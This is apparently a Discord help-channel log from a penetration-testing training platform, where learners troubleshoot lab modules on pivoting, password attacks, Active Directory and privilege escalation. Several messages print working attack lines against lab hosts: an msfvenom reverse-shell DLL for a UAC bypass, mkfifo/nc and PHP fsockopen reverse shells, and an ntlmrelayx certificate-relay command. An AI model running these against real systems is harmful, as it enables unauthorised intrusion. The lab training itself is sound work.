#modules
Hello, I'm contacting you because I'm stuck on the SQL statement question in the fundamental SQL injection module, where I'm asked to find the department table, except that it isn't in any database (there are four databases, this one:
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
4 rows in set (0.000 sec)
Thank you for your help. Have a nice day/evening.
if I am attacking a target through a ligolo-ng tunnel, and I am using metasploit, what do I set as my LHOST?
Tables exist in databases
You'll need to use the create_listener function in ligolo to create a forward to your host
Ok I added this to my Ligolo session:
listener_add --addr 0.0.0.0:1234 (my pivot) --to 0.0.0.0:4444 (my parrot)
Then do I set my LPORT to 1234 or 4444?
let me ask you this: how do you expect the payload to return to you
my target is on 172.0.0.1. My pivot is on 172.0.0.2. My Parrot is on 10.10.14.1.
I need the payload that metasploit delivers to go to 172.0.0.2:1234 --> reverse shell to 10.10.14.1:4444

as a note for payloads like this it's kinda awkward; i generally dislike using metasploit through ligolo
if you can, use a manual payload instead of an automated one
anyone doing the Detecting Windows Attacks with Splunk modules i cant open the Splunk siem, im using EU server
here ?
yes; you'll have to use a database to see its tables
i believe the module teaches you basic enumeration commands @nocturne geyser
the basics of any database tool
databases hold tables; tables hold data
Are u in this Module?
thats what i did, thanks!
connect to the target and attempt to use plink.exe to pivot... it's really that simple; it's optional and not required so there's no actual flag to grab/recover
ye, figured it out, was just a bit confused, I thought I had to do it from a windows attack host I had to connect to from my machine
I mean I'd highly recommend setting up a Windows VM and trying it from there as well, it should also be possible. And a Windows VM will be useful
Oh, already done, I have one set up for reverse engineering and stuff, just used that
Sorry I was not aware of that. My bad
it's alright, it happens. most people don't look at channel descriptions
Hey guys, i need help with the bash scripting intro module. i don't know what's wrong with my script and keep getting a bad decrypt error
It's the task where you have to encode var 28 times via a for loop and then run the decrypt function to get the flag
I added the for loop, and also used the number of characters in var as the salt variable
@fallow gazelle that module is above tier 0 so sharing info is against the rules :) (see channel desc.)
My bad
dm me your for-loop and variable assignment; i feel like I know where your issue may be (i don't need the whole code)
DM'd, thank you, any help is appreciated
Hello I am currently new to ligolo and I am facing issues connecting to the target machine I guess because of the certificate. I tried to see if ippsec uses ligolo but couldn't find any
this is the command issued from the attacker machine :
$ ligolo-proxy -selfcert
Hello everyone greetings please I'm not getting the protocol for the 5500 in the nmap -sC -sV -p5500 -Pn
On the coldfusion Discovery & Enumeration
Section of the attacking common applications
Module
Yeah it worked, thanks
All scans are being filtered
Shells and Payloads module - Live Engagement section
Hi everyone, where can i find a browser in the foothold host?
Intro to AD rdp connection just fails
Check your Internet connection
try another client? i have more luck with remmina
hey guys
i cant open the Splunk siem while doing the Detecting Windows Attacks with Splunk modules, im using EU server
lol
well thats one way to eliminate xfreerdp
no i just used ovpn --config on the downloaded vpn file
thats usually the cause of intermittent network issues
i would probs restart environment and failing that restart vm
this is the 6 target machine ive spun up 
damn
i guess its the vpn issue the ping takes too much time to respond 240ms
maybe, depends where you are. i deal with more than that from australia and it generally works pretty fine
i see ,k let me try different vpn
damn i overshadowed this .
mb
hi guys i am stuck at Intro to Whitebox Pentesting SA2. although i patched the script i am still getting "code injection should not be possible", even without sanitization or validation, even after i removed the function call to console.log.
EDIT : beside what i mentioned i moved the validation and sanitization inside of try block instead of the function and i got the flag
all g bro
On the Network Foundations module, in the last part (Skills Assessment), there is a step where i have to do nc -v <target ip> <dynamic port>. in the example on htb it says
(UNKNOWN) [10.129.233] 49704 (?) open
but when i use it i get (UNKNOWN) [10.129.233] 4970 (?) : Connection refused
I haven't done any of those modules, but I'd make sure you are using https and the correct port, as generally folks who have issues accessing the splunk search head usually don't try https. Hope that helps.
Can someone explain me how to select between web shell, bind shell or reverse shell and how to select the right one from the infinite list?
i dont think the brute force method is the best
Did you read through the sections that cover these and what their differences are?
thanks bro i just figured it out tho
https://academy.hackthebox.com/beta/module/81/section/787
I dont really understand wher Im supposed to find this file
Often if a file is provided, it can be found within Resources.
I don't see them, could it be because i'm in the beta version of htb ?
If a Resources button isn't present, that usually means there are no provided Resources. I haven't done that module, so I unfortunately don't have any other information. As for the beta version, not sure, but if you can switch versions, you could verify that information.
yeah i found them now, it's actually because the beta version doesn't have them yet. Thx
Awesome! Good to know, thanks.
https://academy.hackthebox.com/module/147/section/1335
For exploiting ESC8, using ntlmrelayx gave me this error, I have tried using a new venv to downgrade the crypto version but other errors kept popping up. I'm curious why certipy's relay function won't work on this one. Does anybody have the solution for this?
I got problem spawn a server in a module, its like just refreshing, what can i do? :3
Hi,
I'm currently working on the LLM Output Attacks module as part of the AI Red Teamer track and reaching the assessment stage.
Could you please point me to the right place (channel, thread, or person) where I can ask for help or discuss the challenge during the assessment phase?
Hello, targets not spawning on EU academy
yep
Should I change the VPN server or is it like that everywhere?
idk trying to spawn with us server
what is mean of that question ?
john --wordlist=/usr/share/wordlists/rockyou.txt --format=ripemd-128
use /usr/share/wordlists/rockyou.txt
I know how can I crack
ping me if works
yes US 1 works fine
it will be prolly mentioned there
ty
can u make it more clear ? Please
what module is it?
Introduction to John The Ripper
yes
thats the hash
nah its ripe
btw do u know when i f.e. switch from US 2 to EU 2 back, do I have to change my ovpn file/redownload it?
near bottom of the page here
Read the paragraph underneath the example and it tells you what that hash type is, as the output shows numerous possibilities.
yeah but my question is do I need to redownload the vpn file after I switch back to EU academy 2, which I have used previously?
yes
thanks
yeyy I got the point
@candid bridge i would like to clear up some confusion about the last section of the 2nd module of cwes
https://academy.hackthebox.com/module/75/section/819
here when they say Program a simple web application
they mean you should make the website and test it yourself locally
you dont need to host it and push it to production or even share it with other people
thats why they ask you to do it in a VM in a safe environment
also about attacking the site you have to do it because in this context you are learning the hacks you have to attack it. you can only do so if its hosted locally cause you can just attack a hosted website it would go against the tos/policy of the website hoster(unless its bbh and under boundaries)
but yeah for now keep things local
You might need to use proxychains4 just all depends on what you have configured.
Got it, just did it with ligolo anyway, doesn't matter
also, still can't figure out what the flag is
nvm
I'm blind
Yeah some things are hidden in plain sight
just tried it with proxychains4, it worked, thank you!
This part of the module made me rethink everything I've done so far. I like HTB.
"It's a great idea, until you start putting in the work"
Anyone around for a poke on the priv esc on AEN MS01 host please. I have working routes, not sure if there are more?
Hello everyone, please can I get some assistance on the attacking common applications
On the Attacking Applications Connecting to Services
The gdb debug isn't working
It's saying cannot insert breakpoint 1 and cannot access memory at address 0x....
Please can someone help me out here
The instructions may be in decimal instead of hex
I suggest rereading your notes on password attacks re: credential storage of different kinds
Also, in general, avoid asking for hints on AEN treat it like an exam
Not sure I'll do that, its good advice but not my style. I've completed it blind already
I shall do that, thanks
In decimal I don't think so cuz it shows up when I click run
The module itself is a walkthrough
Yeah. Thats the reason I'm asking, walkthrough doesn't mean thats the only route right? Why I asked anyway...
What i mean is: the module references the steps in decimal, not hex
Gdb may be operating in hex not decimal
So translating +10 in decimal -> hex is A or hex -> dec is 16
Yoo, im doing assessment 2 of brute forcing but my command is making an error, and I dont understand why
You need to attack the ftp server internally
I.e in the memory address should be in decimal
Correct I forget the exact way it is around. But I do remember it being a thing
sorry but what does that mean
The memory address 0x011bc
Connect to the ssh server running on that port, then use tools on that ssh server to attack ftp
That's the memory address
I dont recall all the specifics of that module tbh
I meant when you assign instructions like <start+10>
Oh like main+430
Yeah
weirdly I couldn't connect to ssh at first but now it works thx
Oh okay I'll try it thanks
im doing pass the hash in Password attacks, task 6 where I have to get a reverse shell
I get a call back but the shell does not fully connect
i've reset the machine 4 times and I get the same result
nc.exe : listening on [any] 8001 ...
+ CategoryInfo : NotSpecified: (listening on [any] 8001 ...:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
dir
connect to [172.16.1.5] from (UNKNOWN) [172.16.1.10] 49759
dir
dir
I changed port number, shell type
the machine just hangs
Looks like your payload may be incorrect if youre getting that error. Should be able to follow the module instructions and use the payload specified by the module
is there a way to turn off windows defender without admin rights
Not really, sans some special permissions. Best to just say which module/section/question you're on, you could be going down a rabbithole.
hello guys I'm new here. I've been working on the Fawn module, I was at Task 7. The answer must be ftp -h but it says incorrect task flag, what do i do? ty
That's not a module, that's a Starting Point machine. #starting-point
Hello There. Can anyone tell me where to download the pcap in the module "Guided Lab: Traffic Analysis Workflow"?
and see the pinned messages for the answer in that channel
sorry sir ty for that
Anyone?
Hello all. I'm working on the brute force - web services module with medusa. In this lesson we are asked to find a password (that I have) then login in the ssh server of the distant machine and check around one or 2 things. The problem : whatever i do i get a permission denied (publickey) on every thing I tried. What I m doing wrong here ?
@weary crow module is above tier 0, avoid spoiling
Specify the port with -p
By default it attempts to connect to port 22, which is locked down on public containers
I just found -p 5 seconds ago
the always true "I'm stupid or what ??" ...
I used -P ...
Linux is case sensitive
-p and -P are different switches
yeah I have no idea why I typed that
Oh I'm so sorry that I didn't know
I just did this lab as well, couldnt get the UAC bypass to work for the elevated shell, tried to reset the box, tried signout/signin on the RDP, doesn't seem to work the way its supposed to. Has anyone got this to work recently? if so, DM me
For reference: https://academy.hackthebox.com/module/67/section/626
kali: msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.132 LPORT=8443 -f dll > srrstr.dll
kali: nc -lvnp 8443
kali: python3 -m http.server 8081
PS: curl http://10.10.14.132:8081/srrstr.dll -O "C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll"
cmd: tasklist /svc | findstr "SystemPropertiesAdvanced"
# output is Empty
cmd C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe
# No activity on the nc listener, also tried exploit/multi/handler with the above settings
completed another section of CDSA gonna do another today
Looking for help on Attacking AI - Application and System - Model Deployment Tampering
Can't figure out walkthrough for challenge "Exploit the ShellTorch vulnerability to obtain the flag. " copying and pasting does not pop the payload.
On the getting started module - privilege escalation section is it not possible to load linPEAS on remote host via python http server? Is there a firewall in place ?
what error are you getting
What could be the problem? I'm going through this module (https://academy.hackthebox.com/module/147/section/1327) about Password Attacks. I got to Network Services, but for some reason the utility from the module just refuses to work. I have already tried both pwnbox and connecting from my PC via the vpn config, nothing changes. The command just doesn't give anything away. I thought the host might be unavailable, but the ping reaches it.
The files from the archive are username.list and password.list, and you are using user.list and pass.list, are they correct?
yes, I just copied the data from the files to pwnbox via the clipboard and named the files that way. But I also tried with the original archive on my virtual machine, the result is the same.
Seems to be working
Make sure you are not connected twice to the VPN, e.g., having a VM connected to the VPN and at the same time having the workstation on
I'm trying with pwnbox, isn't it connected by default? And i can ping host, I think its on
It is, what I mean is not be connected to the VPN in your local VM at the same time
Anyone can help me for File Upload Skill Assessments how do i intercept the post request made by the ajax scripts? i cant get it around
Try another route, perhaps the ajax scripts one is not the one you need to focus on
And the problem was really in two connections... Thank you
Anyone can help me with these? https://academy.hackthebox.com/module/147/section/1356
- Point: Credential Hunting in Network Shares
- Point: Pass the Certificate
- Point: Skill Assessment - Password Attacks
https://academy.hackthebox.com/module/33/section/518
-Point: Skill Assessment - SQL Injection Fundamentals
https://academy.hackthebox.com/module/23/section/513
-Point: Skills Assessment - File Inclusion
Hello
can anyone help with
https://academy.hackthebox.com/module/296/section/3394
Pentest in a Nutshell module
For the Q1 in Credential Hunting in Network Shares use a PowerShell cmdlet to recursively grep for the domain name without the TLD
since it's tier 0, can I share my screen in one of the voice channels?
I've been stuck on this for 2 days, it's getting frustrating
On which question are you stuck?
all of the Linux Target sections questions, the target instance is showing and I can scan it using nmap, but I can't find the wordpress website to scan it
The first question directs you to an FTP service, did you try to access it?
yes
Okay, then you should have found something
What is the name of the theme used by WordPress on this target?
[i] The main theme could not be detected.
wpscan returned that
and when trying to figure out the theme manually
What about manually finding the theme?
In which directory usually the themes are stored?
If it is not HTTP what about HTTPS
Hello to all . Has anyone completed the android fundamentals module ? I have a problem in final question2 . i use the command: adb shell ls -l /data/data/com.android.settings and i get the following
i try as an answer 1000 but it is wrong . Can anyone help ? thanx in advance
Module: Active Directory Enumeration & Attacks
Section: Kerberoasting - from Linux
The login cred for the user forend is all the way back in the Section: Credentialed Enumeration - from Linux
Why aren't the user:creds mentioned right before the lab within Kerberoasting?
Or is there another intended way of finding the user:pass ?
Anyone can help me solve?? Pm me https://academy.hackthebox.com/module/147/section/1356
- Point: Credential Hunting in Network Shares
- Point: Pass the Certificate
- Point: Skill Assessment - Password Attacks
https://academy.hackthebox.com/module/23/section/513
-Point: Skills Assessment - File Inclusion
Were you able to figure this out? I'm trying to solve the question using only WiNRM (except RDP to SRV01) but cant get around the double hop problem either
On which questions do you need help with as both Credential Hunting in Network Shares and the Pass the Certificate sections have two questions each
Hi everyone, is the foothold host in the Shells and Payloads lab an internal compromised host or the cat5 pc that has access to the foothold host?
The first
Not exactly sure what you are asking, but the image that shows Target Hosts might help you understand the topology.
I searched the smb share with the keyword passw, but none of the passwords work in the first question lol
how is it possible without a shared shell? And how is it possible there are all the tools i need already installed?
The first. I search all smb shares for passw and nothing worked
Is the foothold host an internal compromised host or a cat5 pc that has a shared shell with the foothold host?
It is a provided foothold, via login credentials, so what type of host do you normally have when you can login this way?
dont understand the question
Likewise, I don't understand what you are confused about. Did you access the foothold as per the Connection Instructions?
when you compromise a host, you establish a shell session, but here i see a foothold host without a shell session and with all the tools installed, how is it possible?
A shell session isn't what you get every time you compromise a host, but this isn't the time for that. This scenario is unique in that you are provided access to a host within the network, call it an Assumed Breach if you will and yes the host does have all the tools you need to perform your tasks. If you had already done the pivoting module, it is possible, this would not be the scenario. Regardless, what issue are you having with your foothold?
Pass The Certificate
https://academy.hackthebox.com/module/147/section/1335
Question: What are the contents of flag.txt on jpinkman's desktop?
Anyone can help here?
Curiosity only
Can legitimately follow along with the section.
Hi, I've discovered Administrator credentials in a Windows lab environment that appear to be improperly stored/exposed. Where should I report this security issue?
OK. I am trying to understand.
I took a few months break off from doing the CPTS and now pretty much everything to do with bloodhound does not match the course. As I'm using the latest Kali edition it seems the CE edition is being pushed over whatever was being used before. However it seems that many attributes are not being collected by the collector and/or not being enumerated by the graphing part of bloodhound.
Case in point to illustrate is the "Checking the Domain Users Group's Local Admin & Execution Rights using BloodHound"
The module shows this under "execution rights". Whereas a screenshot of the CE edition as run by me shows 0 items. So what to do? I'm not a big fan of randomly gitcloning stuff so what setup should I be using or should I be looking to downgrade my Kali install to one that's about 1 - 2 years old? Is there a sticky topic that I am missing? Is there maybe a transposition table for equivalent labels/commands between the versions?
Note: running the saved query in the CE edition "Workstations where Domain Users can RDP" yields 0 results.... So something is going wrong somewhere. For the collection I used the SharpHound executable in the c:\tools dir on the victim machine. On second thoughts I uploaded the latest ingestor (found here: https://github.com/SpecterOps/SharpHound/releases/tag/v2.8.0) ran this reloaded and tried again but the result is the same. So what gives?
Hi, I am in desperate need of a hint.
in what seems to be a simple SSRF exercise I am completely stuck.
Module Server-Side attacks, section Exploiting SSRF: there's supposed to be a hidden directory. I tried fuzzing with like 5 wordlists and found absolutely nothing, I also tried fuzzing for open ports but only found the 3306 mysql port open, which I tried using gopherus on but it was useless.
please someone guide me, in the whole CWES path I have never been stuck on something so seemingly trivial
Is there anyone for the Web Attacks Module. Specifically the Section Advanced File Disclosure. I am confused why i can't read source-code like /var/www/html/submitDetails.php or /etc/passwd.
Files i was able to read were /etc/hosts and /flag.php
Noticed this also only happens with the CDATA or Errorbased Approach. With php filter i can /var/www/html/submitDetails.php
for the knowledge check for getting started i cannot seem to get a shell in any type of way. i am using a PHP reverse shell(execshell). do i have to add <php? in front of the php file for it to work? here is my shell:
||php -r '$sock=fsockopen("ip",9004);exec("sh <&3 >&3 2>&3");'|| i dont get anything on my nc listener. also is the website supposed to be this slow i have to wait around 15 seconds every time i click something?
hello
im on the attacking comon services module, in the FTP section
i'm running the lab but i can't establish a connection to the services (i tried the port ||2121|| which was previously responding to nc but isn't now).
idk if there are any problem with the labs or is only in my case
thanks in advance
Please refrain from posting content above Tier 0. I recommend using the search function as this has been asked quite a bit.
Nope, that wasn't your post.
I can't find anyone with similar symptoms when I search, so I'd like to ask a question. Is there a place where I can ask questions at Tier 0 or above?
Read the pinned messages and you can read how you can ask questions.
Hey, i have an issue with the module : RDP and SOCKS Tunneling with SocksOverRDP
https://academy.hackthebox.com/beta/module/158/section/1439
I have to download the SocksOverRDP x64 Binaries, then upload to my target windows and unzip it.
But when i unzip it, the .dll is automatically deleted. I don't know why.
Someone could help me ? thx
I'm on the password attacks spraying, stuffing, and defaults section and i have found the creds in the database but am struggling with the submission format, can you help?
I am currently trying to use || ntlmrelayx || to listen for inbound connections and relay them to the web enrollment service. I am attempting to use the printerbug.py to force the dc01 to authenticate against my machine to be relayed to the certificate authority.
|| I try this :sudo impacket-ntlmrelayx -t http://10.129.111.51/certsrv/certfnsh.asp --adcs -smb2support --template KerberosAuthentication ||
but its always time out
was I wrong?
NVM, i got it!
Hey you can DM your inputs and output from your commands.
anyone who managed to solve the sql injection fundamentals skill assessment?
I am not able to bypass the login page
Hi everyone, does HTB Academy assume that we already know many programming languages and shell environments? Because I often see lines of code mentioned as if the syntax is taken for granted.
----SOLVED----
Hey!
I'm currently working on the Knowledge check of the Pen tester job role path, getting started module (The website with the outdated GetSimple).
I am done with submitting the user.txt, my next task would be obtaining the root.txt flag.
I have run into a little issue with privilege escalation.
||
I have run LinEnum.sh, and I have received an output about a possible sudo pwnage
[+] We can sudo without supplying a password!
Matching Defaults entries for www-data on gettingstarted:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User www-data may run the following commands on gettingstarted:
(ALL : ALL) NOPASSWD: /usr/bin/php
[+] Possible sudo pwnage!
/usr/bin/php
So, as I have learnt it in an earlier task, I have tried running the following command to obtain root access
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.21 8443 >/tmp/f' | tee -a php
My problem comes here. Upon running this, I get the following output:
<h -i 2>&1|nc 10.10.16.21 8443 >/tmp/f' | tee -a php
tee: php: Permission denied
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.21 8443 >/tmp/f
I don't have access to use tee on php. What am I missing? I'm trying but I really can't find a way to get through this.||
----SOLVED----
I completed yet another section of CDSA today.
in ten minutes will do one more section I think this is going well
@pliant fossil while the module is tier 0; try not to reveal direct steps for solving the skill assessment (knowledge check) of the module, this includes things you had to discover and exploit yourself
Sorry, and thank you for the reminder.
in the future, spoiler tags don't really do anything, but iirc they don't show up in the search feature. But if you have enough info not spoiled...well people can easily find it. Again it's tier 0 so you didn't do anything wrong, and congrats for getting through it!
Hello please can someone help me
I'm at the skills assessment
Of attacking common applications
(i) I get the connection but it's not displaying back
there's 3 skill assessments
Yeah
I'm at the first one
I have a connection but it is not working
Please can I get some help on it
so you're at the last question?
Yeah I am
i'm assuming you're using msfconsole and set the target URI properly alongside the RHOST, LHOST, and LPORT options
either that or return to the reading regarding THE APPLICATION and VERSION in use
Okay
The Server is not outputting anything
It's just not responding
I proxied it and it wasn't responding
Could I get a sanity check on the NoSQLi Injection skills assessment 2 for the Senior Web Penetration Tester path?
Anyone able to give me hint on the knowledge check from the getting started module, stuck at the reverse shell part
i used msfconsole on this one but i'm sure you could find other ways to exploit the vulnerability on this server. But as far as 'using the py script' i'm kinda lost there because there's a couple sections that may be relevant to look at not just one
I get it now
"Hey everyone, I'm stuck on the 'Information Gathering - Web Edition' module, in the 'Creepy Crawlies' section.
I'm running the required command python3 ReconSpider.py http://inlanefreight.com, but I keep getting a No route to host error.
I don't know what to do. I've already tried switching VPN servers and I even tried using the Pwnbox, but I get the exact same error. What could be causing this and how can I fix it?"
no route to host sounds like an issue on your end; also try www.inlanefreight.com
actually just checked both http and https should work alongside inlanefreight.com and www.inlanefreight.com
Module: Attack Common Application
section: Exploiting Web Vulnerabilities in Thick-Client Applications
I'm stuck here for the 2nd day
use 0xdf's writeup for 'fatty' or ippsec's video on 'fatty' as that's what this is directly based from
Thanks, I'll
Hi team, I'm having trouble with the "Creepy Crawlies" section of the "Information Gathering - Web Edition" module.
The target machine, inlanefreight.com (10.129.27.33), appears to be offline.
When I run the ReconSpider.py script, it fails with a No route to host error. I've also tried to ping the machine, and it fails with Destination Host Unreachable and 100% packet loss.
To make sure it wasn't my connection, I have already tried:
- Using the Pwnbox (it also fails to ping the target).
- Connecting from my Kali machine.
- Changing my VPN server/region (tried both EU and US).
Since it's unreachable from both the Pwnbox and the VPN, it seems the target machine is down. Could someone please check on it or give it a reset?
Thank you!
there is no 'target machine' it's a live (fake) website
if you have 'no route to host' did you mess with the /etc/hosts file?
"No, I haven't touched my /etc/hosts file. My ping resolves the correct IP (10.129.27.33), but it fails with Destination Host Unreachable.
The key proof is: I tested on the Pwnbox, and the Pwnbox gets the exact same 100% packet loss. The target seems to be unreachable from everywhere."
Hey, old message but I'm currently stuck on this. If you still remember, how did you get around this?
inlanefreight.com isn't a 10.129.x.x target
try
python3 ReconSpider.py https://inlanefreight.com
@kind lance
getting started module - priv escalation page
got a connection timeout error when i was trying to load linpeas.sh
as per my understanding there could be a firewall in place which doesnt allow to download files from host machine
i did a base64 encode and decode but looks like no permissions to run it
it's a public ip; so it won't be able to connect to your machine
umm i gave the tun0 ip ?
linpeas is gonna output a bunch of stuff that may or may not be useful. I suggest manually looking around
this host is on a public_ip:port no?
it's been a min
chmod +x ./linpeas.sh ? @jovial walrus
yeah i forgot to do that ..had to take some chatgpt help to figure that out
Linux Fundamentals Module, Filter Contents section
Could someone give me a hint as to what commands i need to be looking into
i tried using something like || grep -E "(http://|https://)" | sort -u | uniq | wc -l || which didn't seem to work
Edit: Ok i think i got smth better but it's not quite there yet, not sure how to separate the directories from files
Hey @fathom pendant, I just wanted to say thank you! Your tip that "inlanefreight.com isn't a 10.129.x.x target" was the clue that solved the entire mystery.
It turns out my /etc/hosts file had an old line from a different HTB lab, forcing inlanefreight.com to the dead IP 10.129.27.33. That's why I (and even the Pwnbox, when I tested it) was getting a No route to host error.
After your message, I disconnected the VPN, commented out that wrong line, got the real public IP (134.209.24.248), and then added the correct IP to my /etc/hosts for both inlanefreight.com and www.inlanefreight.com (to fix the 301 redirect).
The script ran perfectly after that. I never would have figured it out without your tip. Thanks again!
It's very hard
I did it but its not easy
Review all the section and do all steps and You can resolve the lab
I simply did not use any port scanner, I just looked at what port the machine I was on used for the services and used the same ones to move laterally
Hey yall I have some questions, so I'm using hack the box and the first lesson is about testing the network and it is having me access the ip for the vpn so my questions are 1. How do I know/figure out what vpn the target is using and is there any commands for it and 2. Does the vpn have specific ips that they have for the entire vpn or are they each different like im thinking and 3. If they are different how do I find that ip
how to approach this nimbles box? shall I try to get the flag myself and read through the contents on each page?
When you click "Spawn target" it'll show you the IP of that box.
You either need to be connected through openvpn on your own VM instance, or you can use the pwnbox.
That way, both the target and "your" VM will be on the same subnet and able to talk to each other. @jovial walrus
oh thx I was just wondering if I should do the task myself or read though everyone on that page ..but I decided to get the flag and then read what is there
The modules teach you - and the target is where you practice / apply those techniques.
Can I PM you for a bit more help/guidance?
Hi, did the module SQL Injection Fundamentals get any updates? the final skill assessment is totally different than before
I completed it, but some questions are unanswered and after spawning the lab it's totally another web app
Yes
yes, it got updated
Module: Documenting & Reporting
Steve is learning about the tool that can make logging a session easier. He messages you for help mentioning that he would like to try to split the panes vertically. What do you tell him? (Answer format: [key] + [key] + [key], i.e., fill in the values for "key" and leave the brackets and + signs.)
What i tried;
- [Ctrl] + [b] + [%]
- [Ctrl] + [b] + [Shift] + [5]
- Ctrl + b + Shift + 5
it doesn't work, anyone know why?
Thanks, i get the question
Does anyone know this error? from web fuzzing module of Virtual Host and Subdomain Fuzzing
Command I used: gobuster dns -d inlanefreight.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
Error: Incorrect Usage: invalid value "inlanefreight.com" for flag -d: parse error
Anyone getting 500 error on accessing Academy 2.0 beta ?
Over time command options can change so you can just run gobuster dns -h to see what the new option for specifying the domain is
hey folks
I changed my browser to firefox now vnc(pwnbox) is not accept clipboard from my host
did anyone get this problem ?
did you use academy 2.0?
i have also same problem when using academy 2.0 so i switch back to the original
my problem about vnc not exactly from version of academy I guess
I am also on 1.0 version
Check the permissions in your browser, sometimes rejecting a certain permission could affect the clipboard
No one use firefox ?
@grand sphinx
silly question - but for the AI Red team job path - in the Applications of AI In Infosec - do you need to download and install conda and jupyter notebooks every time you spawn a pwnbox? I'm on the Spam classification section and it appears neither are installed by default
Once your workstation is terminated it loses the installed/downloaded tools/files
hello, i want to ask any body have problem in submitting flag in phishing section in xss module ?
I see your flag submissions, you are most likely copying spaces
Could anyone help me for a module Im stuck at 😭
In Linux Fundamentals - Task Scheduling
It's asking me to find a type for the task dconf.service
Well I used systemctl, as mentioned in the descriptions above, and can't find any types.
What did I do wrong? Im so stuck here for a week or so.
it works, thank you
Hello, please can someone help me with the exploiting thick clients vulnerability? I'm trying to compile the invoke.java but the src code is giving me 62 errors, both the edited src and the normal one
HTB Assistance Needed: Path = AI Red Teamer; Module = Applications of AI in InfoSec; Section = The Malware Dataset.
Issue = After installing conda and the python ai environment, and Jupyter, there is not enough space available in the VM to unzip the malimg.zip file (it is entirely likely I did something wrong).
Issue Summary:
Working on HTB Malimg module in Pwnbox. Need to download and process malimg_paper_dataset_imgs, but every attempt fails with "No space left on device."
Tried:
Installed Miniconda, created ai env, Jupyter works.
Downloaded from ETH Zurich (404), GitHub, and Kaggle (1.1 GB ZIP).
Downloads stop at ~3%, unzip fails.
Cleaned caches, removed conda pkgs/envs, still 90%+ disk use (df -h shows ~1-3 GB free).
Confirmed it's not a network or permission issue.
Current:
Environment OK, but dataset too large for Pwnbox (needs >5 GB free).
Need:
Clarify if storage quota can be increased,
Or if module must be run locally / with smaller dataset.
did the ability to extend target lifetime disappear? i only have the ability to refresh it
Could anyone give a nudge for the last question on Windows Lateral Movement Skills assessment.
What's the content of the flag located at DC C:\Users\Administrator\Desktop\flag.txt?
I have the VNC password, creds for ||arturo, dahlia and rossy|| as well as the NT hash for ||naomy||. I have a reverse shell on BACKUP and RDP to WSUS.
Really do not see the path from here. I'm guessing VNC but no luck there. RDP to BACKUP somehow?
Hello everyone
yo guys
ah yes, one message
im on file inclusion module
on log poisoning section
in the LFI vulnerability, im trying to read /var/log/apache2/access.log, which reads fine
im also able to inject text in the file by changing user-agent header
however, when i inject a php webshell, the file dosent output anything (either by including it or by trying to execute commands by &cmd=)
welp
For these they are not part of the usual infrastructure from HTB so they can only permit the default time alive. So that is by design in this case, other targets with 10.X.x.x ips allow for extension though
You are on the right lines with VNC. Give it another go but think internally... if that helps
Sorry meant to @ you
Thank you! Yeah I kind of figured I might need to run it locally. But need RDP to BACKUP for that?
I presume you have a meterpreter session from the earlier flag, if not you might struggle from there
hm... nope. Have normal revshell as SYSTEM....
Okay that's not end of world just a slightly different route, consider a port forward to the system youre on and then you should be able to VNC over proxy
On phone so cant do much more than this, hope you crack it soon!
Thank you so much! Will give it a try. Just resetting the lab, ran out of time extension
still need help
im trying to download the third file. the open vpn, how do i do that?
Do you want to use the ovpn file or actually download it. Like using get?
Currently working on CPTS Password Attacks Skills assessment. I just completed it and was redoing it to make sure I understood everything. Could a moderator please DM, I have encountered an issue and don't want to post any spoilers
idek what i want, im lowk a noob bro. all im tryna do is like get the vpn to allow me ping ip's and capture the flags
If you want to connect to the vpn (the vpn is already on your system it seems) use sudo openvpn path/file.ovpn
it says command not found
sudo apt install openvpn
now run: sudo openvpn <openvpnfile>
Bumping
mods aren't staff; so we can't just resolve issues
It's more of a general question
All you need to know about the VPN Connection for Academy
you can just ask for anyone that's solved the assessment instead of limiting your request to a mod
Today, when I ran the initial mimi command, it showed (null) for user s**m. I can't figure out why. I have tried everything, was able to get their ticket/hashes, login using a PTH attack, but it still shows (null) for their password
Just realized adding asterisks to obfuscate the user's names messed up my formatting
that's discord
also you did still reveal a lot of info for the assessment (specifically the file format)
Sorry, not trying to spoil or break terms
i mean you could have edited it instead of deleting
But the issue remains the same.
are you saying it gave you the plaintext pw instead of just the hash?
there could be a multitude of reasons as to why that happened, that's not necessarily a bug
do a UDP scan
helppp
i would generally say reach out to support or submit an #1234357888114364508 if you believe it to be an issue with the module
taking so long after 3 mins shows 0%
try T -4
specifically scan port 53, don't do a full -p- scan with UDP
-T 4*
did that only
yes, sorry
do what cowboy suggested and add -T 4 to the scan, see if that speeds anything up
also that module is above tier 0; so don't spoil things like commands
ok sry
taking so long what to do
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-30 01:55 IST
Stats: 0:01:33 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
Nmap scan report for 10.129.2.48
Host is up.
PORT STATE SERVICE VERSION
53/udp open|filtered domain
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
i believe there's an nmap script dns-nsid
also sometimes packet-trace can be helpful if you're not getting the expected results
tried everything not working T_T
PORT STATE SERVICE VERSION
53/tcp filtered domain
53/udp open|filtered domain
try resetting the target, its worked for me when things aren't working correctly
the command you're using should be correct; iirc that's the same command I used. so try resetting the target, changing vpn region, using tcp instead of udp vpn
it worked thank you, wasted so much time on this T_T
after restarting it came with a simple cmd T_T
I didnt get a rev shell at all, tried a few suggestions from people that DM'd me too.
I went for User Added approach which worked
want to DM me your approach?
Hello, I have a question: I just finished the "Footprinting lab easy". I was able to get the flag and wanted to look at the solution to see how they did it. I don't understand the purpose of the "dig" part. It seems they used it to|| find the second FTP service, but I found it with a simple nmap scan, and even in the solution it shows up in their first nmap scan.|| So why all the DNS enumeration? Is it just for training purposes ? (which is a good point)
